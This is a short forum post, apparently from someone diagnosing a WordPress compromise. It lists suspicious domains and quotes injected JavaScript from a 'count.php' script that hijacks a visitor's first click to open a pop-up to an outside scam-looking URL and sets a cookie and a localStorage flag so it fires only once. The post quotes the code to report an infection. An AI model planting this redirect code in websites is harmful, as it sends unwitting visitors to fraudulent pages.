You are correct, unfortunately. I assume I didn’t get it on first try due to ublock and privacy badger.
Here are the offending domains looks like:
www. marycremin .com
1steaglemortgage. atigraphics. com
2k-reflex. com
Appears to be a common infection with word press? The file is “count.php script”
localStorage.setItem('test', 'testValue');
if ((localStorage.getItem('test') !== null) && (localStorage.getItem('click') == null)){
var click_r = false;
document.addEventListener("click", function(){
if(click_r == false){
var date = new Date();date.setTime(date.getTime()+(100*24*60*60*1000));
document.cookie = "a=a; expires=" + date.toGMTString();
localStorage.setItem('click', 'click');
window.open("https://extra-bonus-here.life/?u=7mkpd0d&o=ex5whk5");
click_r = true;
}
});
}